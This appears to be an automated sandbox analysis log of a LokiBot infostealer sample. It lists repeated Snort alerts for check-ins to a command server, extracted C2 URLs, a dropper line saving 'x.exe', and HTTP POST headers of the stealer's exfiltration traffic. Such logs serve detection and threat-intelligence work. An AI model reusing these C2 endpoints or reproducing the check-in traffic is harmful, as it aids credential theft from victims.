                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49795 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49796 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49796 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49796 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49796 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49796 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49797 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49798 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49798 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49798 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49798 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49798 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49799 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49800 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49801 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49801 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49801 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49801 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49801 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49802 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49803 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49803 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49803 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49803 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49803 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49804 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49805 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49806 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49807 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49808 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49808 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49808 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49808 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49808 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49809 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49810 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49811 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49811 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49811 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49811 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49811 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49812 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49814 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49815 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49816 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49816 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49816 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49816 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49816 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49818 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49819 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49819 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49819 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49819 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49819 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49820 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49821 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49821 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49821 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49821 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49821 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49822 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49822 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49822 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49822 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49822 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49823 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49823 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49823 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49823 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49823 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49824 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49824 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49824 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49824 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49824 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49825 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49825 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49825 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49825 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49825 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49826 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49827 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49827 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49827 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49827 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49827 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49828 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49828 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49828 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49828 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49828 -> 172.67.148.126:80
                          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                          Source: Malware configuration extractorURLs: https://altaskifer.sbs/PWS/fre.php
                          Source: Initial file: obj3.SaveToFile obj4.BuildPath(obj5, "x.exe"), 2
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 188Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 188Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
